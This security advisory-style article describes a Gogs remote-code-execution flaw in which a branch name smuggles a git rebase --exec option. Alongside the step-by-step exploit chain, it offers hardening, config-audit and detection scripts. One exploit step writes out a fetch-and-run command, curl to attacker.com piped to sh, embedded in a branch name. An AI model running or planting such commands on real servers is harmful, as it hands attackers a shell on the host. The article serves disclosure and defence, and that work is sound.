Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code

A newly disclosed flaw in the self‑hosted Git service Gogs enables any logged‑in user to run arbitrary commands on the server by exploiting the rebase‑before‑merge feature. The issue scores 9.4 on CVSS, has no public patch yet, and affects Windows, Linux and macOS deployments.

A remote‑code‑execution bug in Gogs – the open‑source Git front‑end many teams run on‑premises – has been assigned a 9.4 CVSS rating by Rapid7. The flaw does not require administrative rights, and it can be triggered by a single malicious pull request.
How the exploit works
Jonah Burgess, a security researcher who discovered the issue, explained the chain in a Rapid7 advisory:
"An authenticated user can create a pull request whose branch name contains the string --exec. When the repository has rebase before merging enabled, Gogs passes the branch name directly to git rebase. The --exec flag tells Git to run a shell command after each commit is replayed, so the attacker’s command is executed on the server."
In practice, the steps are:
- Create an account on a Gogs instance that allows public registration.
- Create a repository – the owner of a repo is automatically granted full control over it.
- Enable rebase merging in the repository settings (a single toggle).
- Open a pull request with a branch name such as feature--exec "curl http://attacker.com/payload|sh".
- When the maintainer clicks Rebase and merge, Gogs runs git rebase --exec "curl http://attacker.com/payload|sh" …, handing the attacker a shell on the host.
The same technique works for any user who already has write access to a repo where rebase merging is turned on. No interaction from other users is required after the pull request is submitted.
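The underlying defect is a general class: a user-controlled name is joined into a command string, and anything in it that looks like an option is parsed as one. The following is an added example, not Gogs' own code, showing a hypothetical reconstruction of that pattern next to a hardened form that validates the name (using a simplified subset of git's ref-name rules, an assumption for illustration) and builds argv as a list so each name is exactly one argument. The branch name and the "echo injected" marker are constructed sample values.

```python
"""Added example (not Gogs' code): validate a user-supplied branch name before
it reaches a git command line, and show why string interpolation fails."""
import re
import shlex
import subprocess
from typing import List

# Simplified subset of git's ref-name rules (git check-ref-format --branch);
# an assumption for illustration, not the complete rule set git enforces.
_FORBIDDEN = re.compile(r"[\s~^:?*\[\\\x00-\x1f\x7f]|\.\.|@\{|//")


def is_safe_branch_name(name: str) -> bool:
    """True only for names git will treat as a ref, never as an option."""
    if not name or name.startswith("-"):      # leading '-' would parse as a flag
        return False
    if _FORBIDDEN.search(name):               # whitespace, control and git-special chars, '..'
        return False
    if name.startswith("/") or name.endswith("/") or name.endswith("."):
        return False
    return not any(p.startswith(".") or p.endswith(".lock") for p in name.split("/"))


def vulnerable_rebase_command(upstream: str, branch: str) -> List[str]:
    """The failure mode the advisory describes: the branch name is joined into
    a command string and then word-split, so '--exec ...' inside the name turns
    into real git options. Hypothetical reconstruction, not Gogs' code."""
    return shlex.split(f"git rebase {upstream} {branch}")


def build_rebase_argv(upstream: str, branch: str) -> List[str]:
    """Hardened form: refuse anything that fails validation and build argv as a
    list, so each name is exactly one argument and no shell ever sees it."""
    for ref in (upstream, branch):
        if not is_safe_branch_name(ref):
            raise ValueError(f"refusing unsafe ref name: {ref!r}")
    return ["git", "rebase", upstream, branch]


def run_rebase(repo_dir: str, upstream: str, branch: str) -> None:
    """Run the rebase with the validated argv (no shell=True, no string join)."""
    subprocess.run(build_rebase_argv(upstream, branch), cwd=repo_dir, check=True)


if __name__ == "__main__":
    hostile = 'feature --exec "echo injected"'          # constructed sample name
    print(vulnerable_rebase_command("main", hostile))   # '--exec' becomes an option
    try:
        build_rebase_argv("main", hostile)
    except ValueError as err:
        print("rejected:", err)
    print(build_rebase_argv("main", "feature/login"))
```

The guard here is the validation, not the list form alone: a name such as feature--exec is a legal ref and is harmless when it travels as a single argv element, which is exactly what the hardened form guarantees and the string-splitting form does not.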
Why it matters
- Cross‑tenant breach – because Gogs often hosts many projects on a single server, a compromised account can read or alter private repositories belonging to other teams.
- Full server compromise – the executed command runs with the same privileges as the Gogs process (typically a dedicated git user, but many installations run it as root). An attacker can dump credentials, install persistence, or pivot to other machines on the network.
- Broad impact – Rapid7 reports that the flaw affects all supported operating systems (Windows, Linux, macOS) and any default‑configured instance. Their scan identified over 1,100 internet‑facing Gogs deployments, and many more are likely hidden behind VPNs or internal firewalls.
Immediate mitigation steps
The Gogs maintainers have not released a patch as of this writing. Until an official fix arrives, administrators can reduce the attack surface with the following configuration changes in app.ini:
- Disable open registration – set DISABLE_REGISTRATION = true to stop unknown users from creating accounts.
- Block repository creation – set MAX_CREATION_LIMIT = 0 to prevent new repos from being added by untrusted users.
- Turn off rebase merging – either globally (ENABLE_REBASE_MERGE = false) or per repository via the UI. This removes the git rebase path that the exploit relies on.
- Enforce strong authentication – require two‑factor authentication for all accounts and rotate any tokens that may have been issued.
- Audit logs – look for HTTP 500 responses during merge operations; they can indicate a failed exploit attempt.
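To check that the three app.ini settings above are actually in place across a fleet, the following added script (not part of Gogs) parses an app.ini and reports each key as ok, missing or weak. The key names and values are the ones given above; which [section] each key lives in is an assumption taken from the usual Gogs layout, and the two sample files are constructed.

```python
"""Added example (not part of Gogs): audit an app.ini for the hardening
settings listed above. Key names and values are the ones the advisory gives;
which [section] each key lives in is an assumption taken from the usual
Gogs layout."""
import configparser
from typing import Dict, List, Tuple

# (section, key, required value); section names are assumptions
REQUIRED: List[Tuple[str, str, str]] = [
    ("service", "DISABLE_REGISTRATION", "true"),
    ("repository", "MAX_CREATION_LIMIT", "0"),
    ("repository", "ENABLE_REBASE_MERGE", "false"),
]


def parse_app_ini(text: str) -> configparser.ConfigParser:
    """Parse Gogs-style INI text. Keys that precede the first [section]
    (APP_NAME, RUN_MODE, ...) go into a synthetic root section so that
    configparser accepts them; key case is preserved."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # keep DISABLE_REGISTRATION upper-case
    cp.read_string("[__root__]\n" + text)
    return cp


def audit(text: str) -> Dict[str, str]:
    """Map 'section.KEY' to 'ok', 'missing' or 'weak (<current value>)'."""
    cp = parse_app_ini(text)
    report: Dict[str, str] = {}
    for section, key, want in REQUIRED:
        label = f"{section}.{key}"
        if not cp.has_option(section, key):
            report[label] = "missing"
            continue
        value = cp.get(section, key).strip()
        report[label] = "ok" if value.lower() == want else f"weak ({value})"
    return report


# Constructed samples: a default-looking app.ini and the hardened version
SAMPLE_WEAK = """\
APP_NAME = Gogs
RUN_MODE = prod

[repository]
ROOT = /srv/gogs/repositories
MAX_CREATION_LIMIT = -1

[service]
DISABLE_REGISTRATION = false
"""

SAMPLE_HARDENED = """\
APP_NAME = Gogs
RUN_MODE = prod

[repository]
ROOT = /srv/gogs/repositories
MAX_CREATION_LIMIT = 0
ENABLE_REBASE_MERGE = false

[service]
DISABLE_REGISTRATION = true
"""

if __name__ == "__main__":
    for name, text in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"{name}: {audit(text)}")
```

Run it against the real file with audit(open("/path/to/app.ini").read()); a "missing" result for ENABLE_REBASE_MERGE means the setting has not been touched at all, which on a default install leaves the per-repository toggle in the UI as the only control.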
Detecting abuse
Rapid7 has published a Metasploit module that automates the full exploit chain for both Linux and Windows targets. Security teams can use the module in a controlled lab to generate Indicators of Compromise (IOCs) such as:
- Unexpected git rebase processes with --exec arguments in the process list.
- New repositories that appear and disappear within minutes (the module creates a temporary repo, runs the payload, then deletes it).
- HTTP 500 status codes in the Gogs access logs during merge actions.
Deploying a simple rule in your SIEM that flags any git rebase command containing --exec is an effective early warning.
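The two log-based IOCs above, the rebase process with --exec and the HTTP 500 on a merge, can be checked with a few lines of logic before they are turned into a SIEM rule. The following added example (not from Rapid7 or Gogs) does both over constructed sample data; the access-log format and the /pulls/<n>/merge path are assumptions for this example and should be adjusted to your own Gogs or reverse-proxy logs.

```python
"""Added example detection logic (not from Rapid7 or Gogs): flag git rebase
invocations carrying --exec/-x, and HTTP 500s on pull-request merge requests.
The process-list and access-log lines are constructed; the access-log format
and the /pulls/<n>/merge path are assumptions for this example."""
import os
import re
import shlex
from typing import List, Tuple

# Assumed Common Log Format line; adjust the pattern to your Gogs/proxy logs
_ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]*\] '
                        r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
_MERGE_PATH_RE = re.compile(r"/pulls/\d+/merge$")


def is_rebase_with_exec(cmdline: str) -> bool:
    """True if the command line is a git rebase that carries an --exec/-x hook,
    including full paths to git and global options such as -C <dir>."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                 # unbalanced quotes: fall back to substrings
        return "rebase" in cmdline and ("--exec" in cmdline or " -x " in cmdline)
    git_at = next((i for i, a in enumerate(argv) if os.path.basename(a) == "git"), None)
    if git_at is None or "rebase" not in argv[git_at + 1:]:
        return False
    rebase_at = argv.index("rebase", git_at + 1)
    return any(a in ("--exec", "-x") or a.startswith("--exec=")
               for a in argv[rebase_at + 1:])


def flag_processes(ps_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Scan 'PID USER COMMAND' lines; return (pid, user, command) for hits."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) == 3 and is_rebase_with_exec(parts[2]):
            hits.append((parts[0], parts[1], parts[2]))
    return hits


def flag_merge_errors(access_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (user, path) for every HTTP 500 on a pull-request merge request."""
    hits = []
    for line in access_lines:
        m = _ACCESS_RE.match(line)
        if m and m["status"] == "500" and _MERGE_PATH_RE.search(m["path"]):
            hits.append((m["user"], m["path"]))
    return hits


# Constructed sample data (not real telemetry)
PROCESS_SAMPLE = [
    "1201 git  /usr/bin/git rebase main feature/login",
    '1337 git  /usr/bin/git rebase --exec "echo injected" main',
    '1402 git  git -C /srv/repos/acme/app rebase -x "echo injected" main',
    "1510 root /usr/bin/git status",
]
ACCESS_SAMPLE = [
    '10.0.0.5 - alice [12/Mar/2025:10:01:02 +0000] "POST /acme/app/pulls/7/merge HTTP/1.1" 302 0',
    '10.0.0.9 - mallory [12/Mar/2025:10:03:15 +0000] "POST /mallory/tmp/pulls/1/merge HTTP/1.1" 500 0',
    '10.0.0.9 - mallory [12/Mar/2025:10:03:20 +0000] "GET /mallory/tmp HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for pid, user, cmd in flag_processes(PROCESS_SAMPLE):
        print(f"ALERT rebase --exec: pid={pid} user={user} cmd={cmd}")
    for user, path in flag_merge_errors(ACCESS_SAMPLE):
        print(f"ALERT merge 500: user={user} path={path}")
```

Matching on the parsed argv rather than a raw substring keeps the rule from firing on a commit message or path that merely contains "--exec", while the -x short form and --exec=... spelling are still caught.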
Long‑term recommendations
- Upgrade to the latest Gogs release as soon as a fix is published. The maintainers have indicated a patch is in preparation.
- Isolate the Gogs service in its own container or VM with minimal privileges. Even if an attacker gains code execution, the damage is limited to that environment.
- Apply the principle of least privilege to the Gogs system user – avoid running the service as root.
- Regularly review repository settings across all projects to ensure rebase merging is only enabled where absolutely necessary.
- Consider alternative Git platforms that provide built‑in protection against branch‑name injection, such as GitLab or Gitea, if you cannot enforce the above mitigations.
What to watch next
Rapid7’s advisory will be updated once a CVE identifier is assigned and a patch is released. Keep an eye on the official Gogs GitHub page and the project's issue tracker for the latest status.
If you manage a Gogs instance, apply the configuration changes today, monitor your logs for the described IOCs, and plan for a rapid upgrade once the fix lands.
